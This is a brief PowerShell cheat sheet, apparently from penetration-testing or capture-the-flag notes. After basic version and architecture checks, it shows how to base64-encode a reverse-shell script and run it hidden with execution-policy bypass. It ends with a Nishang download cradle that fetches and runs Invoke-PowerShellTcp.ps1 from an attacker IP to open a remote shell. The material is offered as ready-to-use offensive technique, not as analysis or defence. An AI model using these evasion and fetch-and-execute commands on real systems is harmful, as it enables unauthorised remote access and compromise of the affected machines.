Powershell Scripts

Basics

Powershell version

$PSVersionTable.PSVersion

Powershell 64bit or 32bit

Check Operating System

[environment]::Is64BitOperatingSystem

Check current Process

[environment]::Is64BitProcess

Example:
alt

If the OS is 64bit and the process is 32bit, then you can relaunch the powershell specifying the 64bit powershell.exe file location.

Powershell 64bit

C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe

Powershell - Encode & Decode

Convert ps1 to base64

$RevShell = Get-Content -Raw ./Invoke-PowerShellIcmp.ps1 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($RevShell)   
$Encoded = [Convert]::ToBase64String($bytes)                 

get the raw content -> Encode to Unicode bytes -> convert to base64

Convert base64 to ps1

Decoding the above encoded string

$Decode = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Encoded))

Encode ps1 file to base64 - in linux

cat 1shell.ps1 | iconv -f UTF8 -t UTF16LE | base64 -w 0

And Execute the above code with following

powershell -nop -W hidden -noni -ep bypass -e <base64-code-from-above-output>

Powershell - reverse shell -Nishang

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15/Invoke-PowerShellTcp.ps1')

Basics​

Powershell version​

Powershell 64bit or 32bit​

Powershell 64bit​

Powershell - Encode & Decode​

Convert ps1 to base64​

Convert base64 to ps1​

Encode ps1 file to base64 - in linux​

Powershell - reverse shell -Nishang​